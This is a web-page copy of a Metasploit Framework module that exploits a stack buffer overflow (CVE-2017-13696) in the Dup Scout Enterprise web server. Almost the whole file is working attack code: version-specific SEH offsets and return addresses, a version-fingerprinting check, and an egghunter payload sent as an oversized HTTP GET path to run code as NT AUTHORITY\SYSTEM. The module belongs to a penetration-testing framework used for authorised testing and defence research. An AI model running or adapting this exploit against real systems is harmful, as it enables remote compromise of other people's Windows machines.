Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/dupscts_bof.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Seh

10
  include Msf::Exploit::Remote::Egghunter

11
  include Msf::Exploit::Remote::HttpClient

12
  prepend Msf::Exploit::Remote::AutoCheck

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Dup Scout Enterprise GET Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a stack-based buffer overflow vulnerability

21
          in the web interface of Dup Scout Enterprise versions <= 10.0.18,

22
          caused by improper bounds checking of the request path in HTTP GET

23
          requests sent to the built-in web server which can be leveraged

24
          to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.

25


26
          This module supports x86 versions of Dup Scout Enterprise and x86

27
          Windows operating systems only and has been tested successfully on

28
          Windows 7 SP1 (x86) and Windows XP SP0 (x86).

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'vportal', # Vulnerability discovery and PoC

33
          'Daniel Teixeira', # Metasploit module

34
          'bcoles', # Automatic targetting and additional targets

35
        ],

36
        'References' => [

37
          ['CVE', '2017-13696'],

38
          ['CWE', '121'],

39
          ['EDB', '42557'],

40
          ['EDB', '49217']

41
        ],

42
        'DefaultOptions' => {

43
          'EXITFUNC' => 'thread'

44
        },

45
        'Platform' => 'win',

46
        'Arch' => ARCH_X86,

47
        'Payload' => {

48
          'BadChars' => "\x00\x09\x0a\x0d\x20\x26",

49
          'Space' => 500

50
        },

51
        'Targets' => [

52
          [ 'Automatic', { 'auto' => true } ],

53
          [

54
            'Dup Scout Enterprise v8.3.16 (x86)',

55
            {

56
              'Version' => '8.3.16',

57
              'Offset' => 552,

58
              # 0x10045543 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-

59
              'Ret' => 0x10045543

60
            }

61
          ],

62
          [

63
            'Dup Scout Enterprise v8.4.16 (x86)',

64
            {

65
              'Version' => '8.4.16',

66
              'Offset' => 552,

67
              # 0x10045c33 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-

68
              'Ret' => 0x10045c33

69
            }

70
          ],

71
          [

72
            'Dup Scout Enterprise v9.0.28 (x86)',

73
            {

74
              'Version' => '9.0.28',

75
              'Offset' => 552,

76
              # 0x1004d983 : pop ebx # pop ecx # ret 0x20 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-

77
              'Ret' => 0x1004d983

78
            }

79
          ],

80
          [

81
            'Dup Scout Enterprise v9.1.14 (x86)',

82
            {

83
              'Version' => '9.1.14',

84
              'Offset' => 552,

85
              # 0x10081b78 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-

86
              'Ret' => 0x10081b78

87
            }

88
          ],

89
          [

90
            'Dup Scout Enterprise v9.5.14 (x86)',

91
            {

92
              'Version' => '9.5.14',

93
              'Offset' => 2488,

94
              # POP # POP # RET [libspp.dll]

95
              'Ret' => 0x10050ff3

96
            }

97
          ],

98
          [

99
            'Dup Scout Enterprise v9.9.14 (x86)',

100
            {

101
              'Version' => '9.9.14',

102
              'Offset' => 2496,

103
              # 0x10056c1d : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-

104
              'Ret' => 0x10056c1d

105
            }

106
          ],

107
          [

108
            'Dup Scout Enterprise v10.0.18 (x86)',

109
            {

110
              'Version' => '10.0.18',

111
              'Offset' => 2496,

112
              # 0x10056a16 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-

113
              'Ret' => 0x10056a16

114
            }

115
          ],

116
        ],

117
        'Notes' => {

118
          'Stability' => [ CRASH_SERVICE_DOWN ],

119
          'SideEffects' => [ IOC_IN_LOGS ],

120
          'Reliability' => [ REPEATABLE_SESSION ]

121
        },

122
        'Privileged' => true,

123
        'DisclosureDate' => '2017-03-15',

124
        'DefaultTarget' => 0

125
      )

126
    )

127
  end

128


129
  def check

130
    res = send_request_cgi({

131
      'uri' => '/',

132
      'method' => 'GET'

133
    })

134


135
    unless res

136
      return CheckCode::Unknown('Connection failed.')

137
    end

138


139
    version = res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first

140


141
    unless version

142
      return CheckCode::Safe('Target is not Dup Scout Enterprise.')

143
    end

144


145
    unless target_for_version(version)

146
      return CheckCode::Detected("No targets for Dup Scout Enterprise version #{version}.")

147
    end

148


149
    CheckCode::Appears("Dup Scout Enterprise version #{version}.")

150
  end

151


152
  def dup_version

153
    res = send_request_cgi({

154
      'uri' => '/',

155
      'method' => 'GET'

156
    })

157


158
    unless res

159
      return fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.')

160
    end

161


162
    res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first

163
  end

164


165
  def target_for_version(version)

166
    return unless version

167


168
    targets.select { |t| version == t['Version'] }.first

169
  end

170


171
  def exploit

172
    my_target = target

173


174
    if target.name == 'Automatic'

175
      print_status('Selecting a target...')

176
      my_target = target_for_version(dup_version)

177
      unless my_target

178
        fail_with(Failure::NoTarget, 'Unable to automatically detect a target')

179
      end

180
    end

181


182
    print_status("Using target: #{my_target.name}")

183


184
    eggoptions = {

185
      checksum: true,

186
      eggtag: rand_text_alpha(4, payload_badchars)

187
    }

188


189
    hunter, egg = generate_egghunter(

190
      payload.encoded,

191
      payload_badchars,

192
      eggoptions

193
    )

194


195
    sploit = rand_text_alpha(my_target['Offset'], payload_badchars)

196
    sploit << generate_seh_record(my_target.ret)

197
    sploit << hunter

198
    sploit << make_nops(10)

199
    sploit << egg

200
    sploit << rand_text_alpha(5500, payload_badchars)

201


202
    print_status("Sending payload (#{sploit.length} bytes) ...")

203


204
    send_request_cgi({

205
      'method' => 'GET',

206
      'uri' => sploit

207
    })

208
  end

209
end

210


211